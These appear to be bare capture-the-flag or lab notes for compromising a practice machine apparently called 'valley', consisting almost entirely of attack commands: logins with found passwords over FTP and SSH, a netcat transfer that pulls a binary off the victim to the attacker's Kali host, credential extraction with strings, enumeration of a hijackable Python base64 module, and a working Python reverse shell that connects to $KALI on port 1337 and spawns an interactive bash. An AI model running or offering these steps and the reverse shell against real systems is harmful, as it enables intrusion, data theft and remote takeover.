ftp $VICTIM 37370
Username: siemDev
Password: california
TCP/22 - SSH
Kali
ssh valleyDev@$VICTIM
Password: ph0t0s1234
Kali
Lateral Movement
Netcat
Kali(receiving)
nc -l -p 1234 > valleyAuthenticator
Victim(sending)
nc -w 3 $KALI 1234 < valleyAuthenticator
Kali
strings valleyAuthenticator > out.txt
Victim
Username: valley
Password: liberty123
Victim
cat /photos/script/photosEncrypt.py
Victim
locate base64
ls -lah /usr/lib/python3.8/base64.py
groups
Python Reverse Shell
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("$KALI",1337))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])